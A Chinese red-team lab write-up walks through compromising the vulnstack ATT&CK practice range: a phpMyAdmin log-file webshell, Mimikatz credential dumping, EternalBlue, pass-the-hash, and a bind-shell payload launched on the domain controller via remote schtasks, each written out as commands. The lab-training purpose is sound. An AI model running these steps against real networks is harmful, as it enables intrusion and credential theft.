1. 程式人生 > >ATT&CK紅隊評估實戰靶場(一)

ATT&CK紅隊評估實戰靶場(一)

靶機下載地址 http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 攻擊拓撲如下 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530114747209-326607293.png) 0x01環境搭建 配置兩卡,僅主機模式192.168.52.0網段模擬內網,192.168.72.0網段模擬外網 Kali linux IP 192.168.72.131 win7 IP 192.168.72.130/192.168.52.143 win2003 IP 192.168.72.141 DC 2008 IP 192.168.52.138 0X02資訊收集 用nmap找到外網IP地址 netdiscover -i eth0 -r 192.168.72.0/24 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530160907276-625114542.png) 御劍掃目錄掃到後臺 掃到目錄http://192.168.72.130/phpmyadmin/ 弱口令root /root進入後臺 0x03phpmyadmin後臺getshell show variables like '%general%'; #檢視日誌狀態 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161029596-2073858694.png) SET GLOBAL general_log='on' ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161057722-1870318937.png) SET GLOBAL general_log_file='C:/phpStudy/www/233.php' 設定路徑 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161119728-2029952979.png) SELECT '' //寫入一句話木馬 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161208618-1497642554.png) getshell http://192.168.72.130/233.php ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161237975-658072325.png) 0x04許可權提升 直接用Cs的指令碼ms14-068提權 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161746784-2132467428.png) 0x05內網資訊收集 把webshell轉換成cs上線 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161310125-2005225871.png) ipconfig /all ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161403980-521254427.png) hashdump看一下密碼 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161327904-1157961686.png) 再用mimikatz抓一下明文密碼,抓到hongrisec@2020 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161547325-383717496.png) shell net user /domain 檢視域內使用者 使用lodan掃描內網網路 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161823342-1084324253.png) 使用lazagone.exe 抓取本機所有密碼 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161938751-834488967.png) 抓到了很多win7機器上的密碼 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530161949063-800904094.png) 用Msf的這個模組可以判斷目標機器上面裝了那些軟體 run post/windows/gather/enum_applications 使用這個之後發現win7(雙網絡卡機器)上有一個現成的nmap 直接用beacon下的nmap去掃描DC的漏洞 shell nmap --script=vuln 192.168.52.138 發現域控存在ms17-010 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162140921-392848717.png) ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162233406-857154252.png) 這裡其實已經可以直接去用Msf打域控的17010了 0x06MSF與CS聯動 新啟一個監聽,用foriereverse_tcp,然後msf開始監聽埠,成功轉接cs的shell ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162911278-1299049548.png) 檢視當前網段並新增路由 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163012863-230836047.png) 0x07配置msf代理 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530162952296-264828977.png) 之前掃描的是DC,先看一下2003有沒有漏洞,掃一下141,其實不掛代理也行,win7裡面有一個Nmap,這裡要注意socks代理不支援icmp協議 proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms17-010.nse 192.168.52.141 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163206575-849723770.png) 0x08兩種拿下2003 因為已經知道了漏洞,直接永恆之藍打過去了 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163240146-706323753.png) PTH方法 選擇之前生成的那個smb beacon 然後在用雜湊傳遞的方法,域內管理員的賬號直接登入 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163419046-595976819.png) ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163429598-1649625539.png) 192.168.52.141成功上線 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163439015-1735634237.png) 0x09票據+計劃任務拿DC mimikatz sekurlsa::pth /domain:god.org /user:administrator /ntlm:81be2f80d568100549beac645d6a7141 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163539877-1354767368.png) shell dir \\192.168.52.138\c$ //dir DC的目錄 ![](https://img2020.cnblogs.com/blog/1768739/202005/1768739-20200530163557780-211069986.png) 生成一個exe馬 這裡用windows/reverse_bind_tcp LHOST=0.0.0.0 LPORT=7777 生成正向的馬 yukong.exe 把馬複製到域控機器上shell copy C:\yukong.exe \\192.168.52.138\c$ 然後再用這個寫入計劃任務的方法去連線,這裡馬反彈會連不成功,所以 shell schtasks /create /tn "test" /tr C:\yukong.exe /sc once /st 22:14 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2020" 掛著win7代理 proxy nc -vv 192.168.52.138 7777 即可彈回DC138的shell 用Meterpreter的馬也可以,之前失敗了,後續還是改成meterpreter的馬,或者把普通shell再升級成meterpreter再匯入cs也可以 馬上線之後清除計劃任務schtasks /delete /s 192.168.52.138 /tn "test" /f 本靶場有很多地方都可以打成功,可以自己嘗試